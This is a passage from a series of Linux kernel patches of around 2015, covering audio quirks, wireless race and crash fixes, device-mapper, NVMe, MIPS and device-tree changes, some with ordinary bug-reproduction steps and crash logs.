Torvalds Cc: "H. Peter Anvin" Cc: Thomas Gleixner Cc: linux-kernel@vger.kernel.org Signed-off-by: Ingo Molnar --- arch/x86/boot/compressed/misc.h | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/arch/x86/boot/compressed/misc.h b/arch/x86/boot/compressed/misc.h index 89dd0d78013a..805d25ca5f1d 100644 --- a/arch/x86/boot/compressed/misc.h +++ b/arch/x86/boot/compressed/misc.h @@ -2,15 +2,14 @@ #define BOOT_COMPRESSED_MISC_H /* - * we have to be careful, because no indirections are allowed here, and - * paravirt_ops is a kind of one. As it will only run in baremetal anyway, - * we just keep it from happening + * Special hack: we have to be careful, because no indirections are allowed here, + * and paravirt_ops is a kind of one. As it will only run in baremetal anyway, + * we just keep it from happening. (This list needs to be extended when new + * paravirt and debugging variants are added.) */ #undef CONFIG_PARAVIRT +#undef CONFIG_PARAVIRT_SPINLOCKS #undef CONFIG_KASAN -#ifdef CONFIG_X86_32 -#define _ASM_X86_DESC_H 1 -#endif #include #include From 81a1231bf8d6c244681a87808681cf00919df77c Mon Sep 17 00:00:00 2001 From: Kailang Yang Date: Thu, 28 May 2015 16:48:22 +0800 Subject: [PATCH 457/872] ALSA: hda/realtek - Suooprt Dell headset mode for ALC256 Dell SSID 0x0706 support headset mode. Signed-off-by: Kailang Yang Signed-off-by: Takashi Iwai --- sound/pci/hda/patch_realtek.c | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c index 464168426465..80be33ce1a9e 100644 --- a/sound/pci/hda/patch_realtek.c +++ b/sound/pci/hda/patch_realtek.c @@ -5376,6 +5376,13 @@ static const struct snd_hda_pin_quirk alc269_pin_fixup_tbl[] = { {0x17, 0x40000000}, {0x1d, 0x40700001}, {0x21, 0x02211040}), + SND_HDA_PIN_QUIRK(0x10ec0256, 0x1028, "Dell", ALC255_FIXUP_DELL1_MIC_NO_PRESENCE, + ALC255_STANDARD_PINS, + {0x12, 0x90a60160}, + {0x14, 0x90170120}, + {0x17, 0x40000000}, + {0x1d, 0x40700001}, + {0x21, 0x02211030}), SND_HDA_PIN_QUIRK(0x10ec0256, 0x1028, "Dell", ALC255_FIXUP_DELL1_MIC_NO_PRESENCE, ALC256_STANDARD_PINS, {0x13, 0x40000000}), From 1ef9f0583514508bc93427106ceef3215e4eb1a5 Mon Sep 17 00:00:00 2001 From: Wolfram Sang Date: Fri, 29 May 2015 19:50:56 +0900 Subject: [PATCH 458/872] ALSA: usb-audio: Add mic volume fix quirk for Logitech Quickcam Fusion Fix this from the logs: usb 7-1: New USB device found, idVendor=046d, idProduct=08ca ... usb 7-1: Warning! Unlikely big volume range (=3072), cval->res is probably wrong. usb 7-1: [5] FU [Mic Capture Volume] ch = 1, val = 4608/7680/1 Signed-off-by: Wolfram Sang Cc: Signed-off-by: Takashi Iwai --- sound/usb/mixer.c | 1 + 1 file changed, 1 insertion(+) diff --git a/sound/usb/mixer.c b/sound/usb/mixer.c index 3e2ef61c627b..4256fdedbd80 100644 --- a/sound/usb/mixer.c +++ b/sound/usb/mixer.c @@ -918,6 +918,7 @@ static void volume_control_quirks(struct usb_mixer_elem_info *cval, case USB_ID(0x046d, 0x081d): /* HD Webcam c510 */ case USB_ID(0x046d, 0x0825): /* HD Webcam c270 */ case USB_ID(0x046d, 0x0826): /* HD Webcam c525 */ + case USB_ID(0x046d, 0x08ca): /* Logitech Quickcam Fusion */ case USB_ID(0x046d, 0x0991): /* Most audio usb devices lie about volume resolution. * Most Logitech webcams have res = 384. From ab499db80fcf07c18e4053f91a619500f663e90e Mon Sep 17 00:00:00 2001 From: Michal Kazior Date: Fri, 22 May 2015 10:22:40 +0200 Subject: [PATCH 459/872] mac80211: prevent possible crypto tx tailroom corruption There was a possible race between ieee80211_reconfig() and ieee80211_delayed_tailroom_dec(). This could result in inability to transmit data if driver crashed during roaming or rekeying and subsequent skbs with insufficient tailroom appeared. This race was probably never seen in the wild because a device driver would have to crash AND recover within 0.5s which is very unlikely. I was able to prove this race exists after changing the delay to 10s locally and crashing ath10k via debugfs immediately after GTK rekeying. In case of ath10k the counter went below 0. This was harmless but other drivers which actually require tailroom (e.g. for WEP ICV or MMIC) could end up with the counter at 0 instead of >0 and introduce insufficient skb tailroom failures because mac80211 would not resize skbs appropriately anymore. Fixes: 8d1f7ecd2af5 ("mac80211: defer tailroom counter manipulation when roaming") Signed-off-by: Michal Kazior Signed-off-by: Johannes Berg --- net/mac80211/main.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/net/mac80211/main.c b/net/mac80211/main.c index 99d27babd9f0..674164fe5cdb 100644 --- a/net/mac80211/main.c +++ b/net/mac80211/main.c @@ -246,6 +246,7 @@ static void ieee80211_restart_work(struct work_struct *work) { struct ieee80211_local *local = container_of(work, struct ieee80211_local, restart_work); + struct ieee80211_sub_if_data *sdata; /* wait for scan work complete */ flush_workqueue(local->workqueue); @@ -254,6 +255,8 @@ static void ieee80211_restart_work(struct work_struct *work) "%s called with hardware scan in progress\n", __func__); rtnl_lock(); + list_for_each_entry(sdata, &local->interfaces, list) + flush_delayed_work(&sdata->dec_tailroom_needed_wk); ieee80211_scan_cancel(local); ieee80211_reconfig(local); rtnl_unlock(); From 6cbfb1bb66e4e85da5db78e8ff429a85bd84ce64 Mon Sep 17 00:00:00 2001 From: Michal Kazior Date: Fri, 22 May 2015 10:57:22 +0200 Subject: [PATCH 460/872] cfg80211: ignore netif running state when changing iftype It was possible for mac80211 to be coerced into an unexpected flow causing sdata union to become corrupted. Station pointer was put into sdata->u.vlan.sta memory location while it was really master AP's sdata->u.ap.next_beacon. This led to station entry being later freed as next_beacon before __sta_info_flush() in ieee80211_stop_ap() and a subsequent invalid pointer dereference crash. The problem was that ieee80211_ptr->use_4addr wasn't cleared on interface type changes. This could be reproduced with the following steps: # host A and host B have just booted; no # wpa_s/hostapd running; all vifs are down host A> iw wlan0 set type station host A> iw wlan0 set 4addr on host A> printf 'interface=wlan0\nssid=4addrcrash\nchannel=1\nwds_sta=1' > /tmp/hconf host A> hostapd -B /tmp/conf host B> iw wlan0 set 4addr on host B> ifconfig wlan0 up host B> iw wlan0 connect -w hostAssid host A> pkill hostapd # host A crashed: [ 127.928192] BUG: unable to handle kernel NULL pointer dereference at 00000000000006c8 [ 127.929014] IP: [] __sta_info_flush+0xac/0x158 ... [ 127.934578] [] ieee80211_stop_ap+0x139/0x26c [ 127.934578] [] ? dump_trace+0x279/0x28a [ 127.934578] [] __cfg80211_stop_ap+0x84/0x191 [ 127.934578] [] cfg80211_stop_ap+0x3f/0x58 [ 127.934578] [] nl80211_stop_ap+0x1b/0x1d [ 127.934578] [] genl_family_rcv_msg+0x259/0x2b5 Note: This isn't a revert of f8cdddb8d61d ("cfg80211: check iface combinations only when iface is running") as far as functionality is considered because b6a550156bc ("cfg80211/mac80211: move more combination checks to mac80211") moved the logic somewhere else already. Fixes: f8cdddb8d61d ("cfg80211: check iface combinations only when iface is running") Signed-off-by: Michal Kazior Signed-off-by: Johannes Berg --- net/wireless/util.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/wireless/util.c b/net/wireless/util.c index 4cb34557b873..baf7218cec15 100644 --- a/net/wireless/util.c +++ b/net/wireless/util.c @@ -945,7 +945,7 @@ int cfg80211_change_iface(struct cfg80211_registered_device *rdev, ntype == NL80211_IFTYPE_P2P_CLIENT)) return -EBUSY; - if (ntype != otype && netif_running(dev)) { + if (ntype != otype) { dev->ieee80211_ptr->use_4addr = false; dev->ieee80211_ptr->mesh_id_up_len = 0; wdev_lock(dev->ieee80211_ptr); From f7959e9c73200f2ae361d0d311aa501f2c6a05c7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Uwe=20Kleine-K=C3=B6nig?= Date: Thu, 28 May 2015 11:46:12 +0200 Subject: [PATCH 461/872] net: rfkill: gpio: make better use of gpiod API MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Since 39b2bbe3d715 (gpio: add flags argument to gpiod_get*() functions) which appeared in v3.17-rc1, the gpiod_get* functions take an additional parameter that allows to specify direction and initial value for output. Furthermore there is devm_gpiod_get_optional which is designed to get optional gpios. Simplify driver accordingly. Note this makes error checking more strict because only -ENOENT is ignored when searching for the GPIOs which is good. Signed-off-by: Uwe Kleine-König Signed-off-by: Johannes Berg --- net/rfkill/rfkill-gpio.c | 24 ++++++++++-------------- 1 file changed, 10 insertions(+), 14 deletions(-) diff --git a/net/rfkill/rfkill-gpio.c b/net/rfkill/rfkill-gpio.c index d978f2f46ff3..d5d58d919552 100644 --- a/net/rfkill/rfkill-gpio.c +++ b/net/rfkill/rfkill-gpio.c @@ -112,21 +112,17 @@ static int rfkill_gpio_probe(struct platform_device *pdev) rfkill->clk = devm_clk_get(&pdev->dev, NULL); - gpio = devm_gpiod_get(&pdev->dev, "reset"); - if (!IS_ERR(gpio)) { - ret = gpiod_direction_output(gpio, 0); - if (ret) - return ret; - rfkill->reset_gpio = gpio; - } + gpio = devm_gpiod_get_optional(&pdev->dev, "reset", GPIOD_OUT_LOW); + if (IS_ERR(gpio)) + return PTR_ERR(gpio); - gpio = devm_gpiod_get(&pdev->dev, "shutdown"); - if (!IS_ERR(gpio)) { - ret = gpiod_direction_output(gpio, 0); - if (ret) - return ret; - rfkill->shutdown_gpio = gpio; - } + rfkill->reset_gpio = gpio; + + gpio = devm_gpiod_get_optional(&pdev->dev, "shutdown", GPIOD_OUT_LOW); + if (IS_ERR(gpio)) + return PTR_ERR(gpio); + + rfkill->shutdown_gpio = gpio; /* Make sure at-least one of the GPIO is defined and that * a name is specified for this instance From 5530c84f62b49a2e9f8c11a079d00f85ea20bb09 Mon Sep 17 00:00:00 2001 From: Geert Uytterhoeven Date: Tue, 26 May 2015 12:58:37 +0200 Subject: [PATCH 462/872] ARM: multi_v7_defconfig: Replace CONFIG_USB_ISP1760_HCD by CONFIG_USB_ISP1760 Since commit 100832abf065bc18 ("usb: isp1760: Make HCD support optional"), CONFIG_USB_ISP1760_HCD is automatically selected when needed. Enabling that option in the defconfig is now a no-op, and no longer enables ISP1760 HCD support. Re-enable the ISP1760 driver in the defconfig by enabling USB_ISP1760_HOST_ROLE instead. Signed-off-by: Geert Uytterhoeven Signed-off-by: Arnd Bergmann --- arch/arm/configs/multi_v7_defconfig | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/arm/configs/multi_v7_defconfig b/arch/arm/configs/multi_v7_defconfig index 0ca4a3eaf65d..fbbb1915c6a9 100644 --- a/arch/arm/configs/multi_v7_defconfig +++ b/arch/arm/configs/multi_v7_defconfig @@ -429,7 +429,7 @@ CONFIG_USB_EHCI_EXYNOS=y CONFIG_USB_EHCI_TEGRA=y CONFIG_USB_EHCI_HCD_STI=y CONFIG_USB_EHCI_HCD_PLATFORM=y -CONFIG_USB_ISP1760_HCD=y +CONFIG_USB_ISP1760=y CONFIG_USB_OHCI_HCD=y CONFIG_USB_OHCI_HCD_STI=y CONFIG_USB_OHCI_HCD_PLATFORM=y From e5d8de32cc02a259e1a237ab57cba00f2930fa6a Mon Sep 17 00:00:00 2001 From: Mike Snitzer Date: Thu, 28 May 2015 15:12:52 -0400 Subject: [PATCH 463/872] dm: fix false warning in free_rq_clone() for unmapped requests When stacking request-based dm device on non blk-mq device and device-mapper target could not map the request (error target is used, multipath target with all paths down, etc), the WARN_ON_ONCE() in free_rq_clone() will trigger when it shouldn't. The warning was added by commit aa6df8d ("dm: fix free_rq_clone() NULL pointer when requeueing unmapped request"). But free_rq_clone() with clone->q == NULL is valid usage for the case where dm_kill_unmapped_request() initiates request cleanup. Fix this false warning by just removing the WARN_ON -- it only generated false positives and was never useful in catching the intended case (completing clone request not being mapped e.g. clone->q being NULL). Fixes: aa6df8d ("dm: fix free_rq_clone() NULL pointer when requeueing unmapped request") Reported-by: Bart Van Assche Reported-by: Jun'ichi Nomura Signed-off-by: Mike Snitzer --- drivers/md/dm.c | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/drivers/md/dm.c b/drivers/md/dm.c index 1badfb250a18..e24069aaeb18 100644 --- a/drivers/md/dm.c +++ b/drivers/md/dm.c @@ -1082,13 +1082,11 @@ static void rq_completed(struct mapped_device *md, int rw, bool run_queue) dm_put(md); } -static void free_rq_clone(struct request *clone, bool must_be_mapped) +static void free_rq_clone(struct request *clone) { struct dm_rq_target_io *tio = clone->end_io_data; struct mapped_device *md = tio->md; - WARN_ON_ONCE(must_be_mapped && !clone->q); - blk_rq_unprep_clone(clone); if (md->type == DM_TYPE_MQ_REQUEST_BASED) @@ -1132,7 +1130,7 @@ static void dm_end_request(struct request *clone, int error) rq->sense_len = clone->sense_len; } - free_rq_clone(clone, true); + free_rq_clone(clone); if (!rq->q->mq_ops) blk_end_request_all(rq, error); else @@ -1151,7 +1149,7 @@ static void dm_unprep_request(struct request *rq) } if (clone) - free_rq_clone(clone, false); + free_rq_clone(clone); } /* From fec558b5f178d9eb35d2ed76f15489c60e3590bd Mon Sep 17 00:00:00 2001 From: Arnd Bergmann Date: Tue, 19 May 2015 17:05:40 +0200 Subject: [PATCH 464/872] NVMe: fix type warning on 32-bit A recent change to the ioctl handling caused a new harmless warning in the NVMe driver on all 32-bit machines: drivers/block/nvme-core.c: In function 'nvme_submit_io': drivers/block/nvme-core.c:1794:29: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] In order to shup up that warning, this introduces a new temporary variable that uses a double cast to extract the pointer from an __u64 structure member. Signed-off-by: Arnd Bergmann Fixes: a67a95134ff ("NVMe: Meta data handling through submit io ioctl") Acked-by: Keith Busch Signed-off-by: Jens Axboe --- drivers/block/nvme-core.c | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/drivers/block/nvme-core.c b/drivers/block/nvme-core.c index 85b8036deaa3..683dff272562 100644 --- a/drivers/block/nvme-core.c +++ b/drivers/block/nvme-core.c @@ -1750,6 +1750,7 @@ static int nvme_submit_io(struct nvme_ns *ns, struct nvme_user_io __user *uio) struct nvme_iod *iod; dma_addr_t meta_dma = 0; void *meta = NULL; + void __user *metadata; if (copy_from_user(&io, uio, sizeof(io))) return -EFAULT; @@ -1763,6 +1764,8 @@ static int nvme_submit_io(struct nvme_ns *ns, struct nvme_user_io __user *uio) meta_len = 0; } + metadata = (void __user *)(unsigned long)io.metadata; + write = io.opcode & 1; switch (io.opcode) { @@ -1786,13 +1789,13 @@ static int nvme_submit_io(struct nvme_ns *ns, struct nvme_user_io __user *uio) if (meta_len) { meta = dma_alloc_coherent(&dev->pci_dev->dev, meta_len, &meta_dma, GFP_KERNEL); + if (!meta) { status = -ENOMEM; goto unmap; } if (write) { - if (copy_from_user(meta, (void __user *)io.metadata, - meta_len)) { + if (copy_from_user(meta, metadata, meta_len)) { status = -EFAULT; goto unmap; } @@ -1819,8 +1822,7 @@ static int nvme_submit_io(struct nvme_ns *ns, struct nvme_user_io __user *uio) nvme_free_iod(dev, iod); if (meta) { if (status == NVME_SC_SUCCESS && !write) { - if (copy_to_user((void __user *)io.metadata, meta, - meta_len)) + if (copy_to_user(metadata, meta, meta_len)) status = -EFAULT; } dma_free_coherent(&dev->pci_dev->dev, meta_len, meta, meta_dma); From 1b205c535b573fe95b7f6f6577a43671d312556f Mon Sep 17 00:00:00 2001 From: Tony Lindgren Date: Fri, 29 May 2015 09:59:42 -0700 Subject: [PATCH 465/872] ARM: dts: Fix dm816x to use right compatible flag for MUSB With commit 3e457371f436 ("usb: musb: Fix fifo reads for dm816x with musb_dsps") we need to use the right compatible flag to avoid issues with FIFO reads. Cc: Bin Liu Cc: Brian Hutchinson Cc: George Cherian Fixes: 3e457371f436 ("usb: musb: Fix fifo reads for dm816x with musb_dsps") Acked-by: Felipe Balbi Signed-off-by: Tony Lindgren --- arch/arm/boot/dts/dm816x.dtsi | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/arch/arm/boot/dts/dm816x.dtsi b/arch/arm/boot/dts/dm816x.dtsi index de8427be830a..289806adb343 100644 --- a/arch/arm/boot/dts/dm816x.dtsi +++ b/arch/arm/boot/dts/dm816x.dtsi @@ -382,7 +382,7 @@ ti,hwmods = "usb_otg_hs"; usb0: usb@47401000 { - compatible = "ti,musb-am33xx"; + compatible = "ti,musb-dm816"; reg = <0x47401400 0x400 0x47401000 0x200>; reg-names = "mc", "control"; @@ -422,7 +422,7 @@ }; usb1: usb@47401800 { - compatible = "ti,musb-am33xx"; + compatible = "ti,musb-dm816"; reg = <0x47401c00 0x400 0x47401800 0x200>; reg-names = "mc", "control"; From 15b94a690470038aa08247eedbebbe7e2218d5ee Mon Sep 17 00:00:00 2001 From: Junichi Nomura Date: Fri, 29 May 2015 08:51:03 +0000 Subject: [PATCH 466/872] dm: fix reload failure of 0 path multipath mapping on blk-mq devices dm-multipath accepts 0 path mapping. # echo '0 2097152 multipath 0 0 0 0' | dmsetup create newdev Such a mapping can be used to release underlying devices while still holding requests in its queue until working paths come back. However, once the multipath device is created over blk-mq devices, it rejects reloading of 0 path mapping: # echo '0 2097152 multipath 0 0 1 1 queue-length 0 1 1 /dev/sda 1' \ | dmsetup create mpath1 # echo '0 2097152 multipath 0 0 0 0' | dmsetup load mpath1 device-mapper: reload ioctl on mpath1 failed: Invalid argument Command failed With following kernel message: device-mapper: ioctl: can't change device type after initial table load. DM tries to inherit the current table type using dm_table_set_type() but it doesn't work as expected because of unnecessary check about whether the target type is hybrid or not. Hybrid type is for targets that work as either request-based or bio-based and not required for blk-mq or non blk-mq checking. Fixes: 65803c205983 ("dm table: train hybrid target type detection to select blk-mq if appropriate") Signed-off-by: Jun'ichi Nomura Signed-off-by: Mike Snitzer --- drivers/md/dm-table.c | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/drivers/md/dm-table.c b/drivers/md/dm-table.c index d9b00b8565c6..16ba55ad7089 100644 --- a/drivers/md/dm-table.c +++ b/drivers/md/dm-table.c @@ -820,6 +820,12 @@ void dm_consume_args(struct dm_arg_set *as, unsigned num_args) } EXPORT_SYMBOL(dm_consume_args); +static bool __table_type_request_based(unsigned table_type) +{ + return (table_type == DM_TYPE_REQUEST_BASED || + table_type == DM_TYPE_MQ_REQUEST_BASED); +} + static int dm_table_set_type(struct dm_table *t) { unsigned i; @@ -852,8 +858,7 @@ static int dm_table_set_type(struct dm_table *t) * Determine the type from the live device. * Default to bio-based if device is new. */ - if (live_md_type == DM_TYPE_REQUEST_BASED || - live_md_type == DM_TYPE_MQ_REQUEST_BASED) + if (__table_type_request_based(live_md_type)) request_based = 1; else bio_based = 1; @@ -903,7 +908,7 @@ static int dm_table_set_type(struct dm_table *t) } t->type = DM_TYPE_MQ_REQUEST_BASED; - } else if (hybrid && list_empty(devices) && live_md_type != DM_TYPE_NONE) { + } else if (list_empty(devices) && __table_type_request_based(live_md_type)) { /* inherit live MD type */ t->type = live_md_type; @@ -925,10 +930,7 @@ struct target_type *dm_table_get_immutable_target_type(struct dm_table *t) bool dm_table_request_based(struct dm_table *t) { - unsigned table_type = dm_table_get_type(t); - - return (table_type == DM_TYPE_REQUEST_BASED || - table_type == DM_TYPE_MQ_REQUEST_BASED); + return __table_type_request_based(dm_table_get_type(t)); } bool dm_table_mq_request_based(struct dm_table *t) From 1c220c69ce0dcc0f234a9f263ad9c0864f971852 Mon Sep 17 00:00:00 2001 From: Joe Thornber Date: Fri, 29 May 2015 14:52:51 +0100 Subject: [PATCH 467/872] dm: fix casting bug in dm_merge_bvec() dm_merge_bvec() was originally added in f6fccb ("dm: introduce merge_bvec_fn"). In that commit a value in sectors is converted to bytes using << 9, and then assigned to an int. This code made assumptions about the value of BIO_MAX_SECTORS. A later commit 148e51 ("dm: improve documentation and code clarity in dm_merge_bvec") was meant to have no functional change but it removed the use of BIO_MAX_SECTORS in favor of using queue_max_sectors(). At this point the cast from sector_t to int resulted in a zero value. The fallout being dm_merge_bvec() would only allow a single page to be added to a bio. This interim fix is minimal for the benefit of stable@ because the more comprehensive cleanup of passing a sector_t to all DM targets' merge function will impact quite a few DM targets. Signed-off-by: Joe Thornber Signed-off-by: Mike Snitzer Cc: stable@vger.kernel.org # 3.19+ --- drivers/md/dm.c | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/drivers/md/dm.c b/drivers/md/dm.c index e24069aaeb18..2caf492890d6 100644 --- a/drivers/md/dm.c +++ b/drivers/md/dm.c @@ -1723,8 +1723,7 @@ static int dm_merge_bvec(struct request_queue *q, struct mapped_device *md = q->queuedata; struct dm_table *map = dm_get_live_table_fast(md); struct dm_target *ti; - sector_t max_sectors; - int max_size = 0; + sector_t max_sectors, max_size = 0; if (unlikely(!map)) goto out; @@ -1739,8 +1738,16 @@ static int dm_merge_bvec(struct request_queue *q, max_sectors = min(max_io_len(bvm->bi_sector, ti), (sector_t) queue_max_sectors(q)); max_size = (max_sectors << SECTOR_SHIFT) - bvm->bi_size; - if (unlikely(max_size < 0)) /* this shouldn't _ever_ happen */ - max_size = 0; + + /* + * FIXME: this stop-gap fix _must_ be cleaned up (by passing a sector_t + * to the targets' merge function since it holds sectors not bytes). + * Just doing this as an interim fix for stable@ because the more + * comprehensive cleanup of switching to sector_t will impact every + * DM target that implements a ->merge hook. + */ + if (max_size > INT_MAX) + max_size = INT_MAX; /* * merge_bvec_fn() returns number of bytes @@ -1748,7 +1755,7 @@ static int dm_merge_bvec(struct request_queue *q, * max is precomputed maximal io size */ if (max_size && ti->type->merge) - max_size = ti->type->merge(ti, bvm, biovec, max_size); + max_size = ti->type->merge(ti, bvm, biovec, (int) max_size); /* * If the target doesn't support merge method and some of the devices * provided their merge_bvec method (we know this by looking for the From 556b6629c10c65cee42fa893681ffdd653d097c4 Mon Sep 17 00:00:00 2001 From: Laurent Fasnacht Date: Wed, 27 May 2015 19:50:00 +0200 Subject: [PATCH 468/872] MIPS: ath79: fix build problem if CONFIG_BLK_DEV_INITRD is not set initrd_start is defined in init/do_mounts_initrd.c, which is only included in kernel if CONFIG_BLK_DEV_INITRD=y. Signed-off-by: Laurent Fasnacht Cc: linux-mips@linux-mips.org Cc: trivial@kernel.org Patchwork: https://patchwork.linux-mips.org/patch/10198/ Signed-off-by: Ralf Baechle --- arch/mips/ath79/prom.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/arch/mips/ath79/prom.c b/arch/mips/ath79/prom.c index e1fe63051136..597899ad5438 100644 --- a/arch/mips/ath79/prom.c +++ b/arch/mips/ath79/prom.c @@ -1,6 +1,7 @@ /* * Atheros AR71XX/AR724X/AR913X specific prom routines * + * Copyright (C) 2015 Laurent Fasnacht * Copyright (C) 2008-2010 Gabor Juhos * Copyright (C) 2008 Imre Kaloz * @@ -25,12 +26,14 @@ void __init prom_init(void) { fw_init_cmdline(); +#ifdef CONFIG_BLK_DEV_INITRD /* Read the initrd address from the firmware environment */ initrd_start = fw_getenvl("initrd_start"); if (initrd_start) { initrd_start = KSEG0ADDR(initrd_start); initrd_end = initrd_start + fw_getenvl("initrd_size"); } +#endif } void __init prom_free_prom_memory(void) From 57b41758230b567218cb5bc3da9068aabc496fc9 Mon Sep 17 00:00:00 2001 From: Petri Gynther Date: Tue, 26 May 2015 23:25:08 -0700 Subject: [PATCH 469/872] MIPS: BMIPS: Fix bmips_wr_vec() bmips_wr_vec() copies exception vector code from start to dst. The call to dma_cache_wback() needs to flush (end-start) bytes, starting at dst, from write-back cache to memory. Signed-off-by: Petri Gynther Acked-by: Florian Fainelli Reviewed-by: Kevin Cernekee Cc: linux-mips@linux-mips.org Patchwork: https://patchwork.linux-mips.org/patch/10193/ Signed-off-by: Ralf Baechle --- arch/mips/kernel/smp-bmips.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/kernel/smp-bmips.c b/arch/mips/kernel/smp-bmips.c index fd528d7ea278..336708ae5c5b 100644 --- a/arch/mips/kernel/smp-bmips.c +++ b/arch/mips/kernel/smp-bmips.c @@ -444,7 +444,7 @@ struct plat_smp_ops bmips5000_smp_ops = { static void bmips_wr_vec(unsigned long dst, char *start, char *end) { memcpy((void *)dst, start, end - start); - dma_cache_wback((unsigned long)start, end - start); + dma_cache_wback(dst, end - start); local_flush_icache_range(dst, dst + (end - start)); instruction_hazard(); } From c4fca4fdea940bda2cff6b844cda6af8ef1c79cc Mon Sep 17 00:00:00 2001 From: "Maciej W. Rozycki" Date: Thu, 28 May 2015 17:46:49 +0100 Subject: [PATCH 470/872] MIPS: strnlen_user.S: Fix a CPU_DADDI_WORKAROUNDS regression Correct a regression introduced with 8453eebd [MIPS: Fix strnlen_user() return value in case of overlong strings.] causing assembler warnings and broken code generated in __strnlen_kernel_nocheck_asm: arch/mips/lib/strnlen_user.S: Assembler messages: arch/mips/lib/strnlen_user.S:64: Warning: Macro instruction expanded into multiple instructions in a branch delay slot with the CPU_DADDI_WORKAROUNDS option set, resulting in the function looping indefinitely upon mounting NFS root. Use conditional assembly to avoid a microMIPS code size regression. Using $at unconditionally would cause such a regression as there are no 16-bit instruction encodings available for ALU operations using this register. Using $v1 unconditionally would produce short microMIPS encodings, but would prevent this register from being used across calls to this function. The extra LI operation introduced is free, replacing a NOP originally scheduled into the delay slot of the branch that follows. Signed-off-by: Maciej W. Rozycki Cc: linux-mips@linux-mips.org Patchwork: https://patchwork.linux-mips.org/patch/10205/ Signed-off-by: Ralf Baechle --- arch/mips/lib/strnlen_user.S | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) diff --git a/arch/mips/lib/strnlen_user.S b/arch/mips/lib/strnlen_user.S index 7d12c0dded3d..77e64942f004 100644 --- a/arch/mips/lib/strnlen_user.S +++ b/arch/mips/lib/strnlen_user.S @@ -34,7 +34,12 @@ LEAF(__strnlen_\func\()_asm) FEXPORT(__strnlen_\func\()_nocheck_asm) move v0, a0 PTR_ADDU a1, a0 # stop pointer -1: beq v0, a1, 1f # limit reached? +1: +#ifdef CONFIG_CPU_DADDI_WORKAROUNDS + .set noat + li AT, 1 +#endif + beq v0, a1, 1f # limit reached? .ifeqs "\func", "kernel" EX(lb, t0, (v0), .Lfault\@) .else @@ -42,7 +47,13 @@ FEXPORT(__strnlen_\func\()_nocheck_asm) .endif .set noreorder bnez t0, 1b -1: PTR_ADDIU v0, 1 +1: +#ifndef CONFIG_CPU_DADDI_WORKAROUNDS + PTR_ADDIU v0, 1 +#else + PTR_ADDU v0, AT + .set at +#endif .set reorder PTR_SUBU v0, a0 jr ra From 8770d0898af7f0f0a8e88ce702b02a9ca326254f Mon Sep 17 00:00:00 2001 From: Pavel Machek Date: Fri, 29 May 2015 21:32:11 +0200 Subject: [PATCH 471/872] ARM: dts: Fix n900 dts file to work around 4.1 touchscreen regression on n900 Fix dts to match what the Linux kernel expects. This works around touchscreen problems in 4.1 linux on Nokia n900. Signed-off-by: Pavel Machek Reviewed-by: Felipe Balbi Signed-off-by: Tony Lindgren --- .../devicetree/bindings/input/touchscreen/tsc2005.txt | 4 ++-- arch/arm/boot/dts/omap3-n900.dts | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/Documentation/devicetree/bindings/input/touchscreen/tsc2005.txt b/Documentation/devicetree/bindings/input/touchscreen/tsc2005.txt index 4b641c7bf1c2..09089a6d69ed 100644 --- a/Documentation/devicetree/bindings/input/touchscreen/tsc2005.txt +++ b/Documentation/devicetree/bindings/input/touchscreen/tsc2005.txt @@ -32,8 +32,8 @@ Example: touchscreen-fuzz-x = <4>; touchscreen-fuzz-y = <7>; touchscreen-fuzz-pressure = <2>; - touchscreen-max-x = <4096>; - touchscreen-max-y = <4096>; + touchscreen-size-x = <4096>; + touchscreen-size-y = <4096>; touchscreen-max-pressure = <2048>; ti,x-plate-ohms = <280>; diff --git a/arch/arm/boot/dts/omap3-n900.dts b/arch/arm/boot/dts/omap3-n900.dts index 5c16145920ea..5f5e0f3d5b64 100644 --- a/arch/arm/boot/dts/omap3-n900.dts +++ b/arch/arm/boot/dts/omap3-n900.dts @@ -832,8 +832,8 @@ touchscreen-fuzz-x = <4>; touchscreen-fuzz-y = <7>; touchscreen-fuzz-pressure = <2>; - touchscreen-max-x = <4096>; - touchscreen-max-y = <4096>; + touchscreen-size-x = <4096>; + touchscreen-size-y = <4096>; touchscreen-max-pressure = <2048>; ti,x-plate-ohms = <280>; From 9aecac04d8d89e730ae362a748113b19c06a9d39 Mon Sep 17 00:00:00 2001 From: Guenter Roeck Date: Wed, 27 May 2015 16:11:48 -0700 Subject: [PATCH 472/872] hwmon: (tmp401) Do not auto-detect chip on I2C address 0x37 I2C address 0x37 may be used by EEPROMs, which can result in false positives. Do not attempt to detect a chip at this address. Reviewed-by: Jean Delvare Cc: stable@vger.kernel.org # v4.0+ Signed-off-by: Guenter Roeck --- Documentation/hwmon/tmp401 | 2 +- drivers/hwmon/tmp401.c | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Documentation/hwmon/tmp401 b/Documentation/hwmon/tmp401 index 8eb88e974055..711f75e189eb 100644 --- a/Documentation/hwmon/tmp401 +++ b/Documentation/hwmon/tmp401 @@ -20,7 +20,7 @@ Supported chips: Datasheet: http://focus.ti.com/docs/prod/folders/print/tmp432.html * Texas Instruments TMP435 Prefix: 'tmp435' - Addresses scanned: I2C 0x37, 0x48 - 0x4f + Addresses scanned: I2C 0x48 - 0x4f Datasheet: http://focus.ti.com/docs/prod/folders/print/tmp435.html Authors: diff --git a/drivers/hwmon/tmp401.c b/drivers/hwmon/tmp401.c index 99664ebc738d..ccf4cffe0ee1 100644 --- 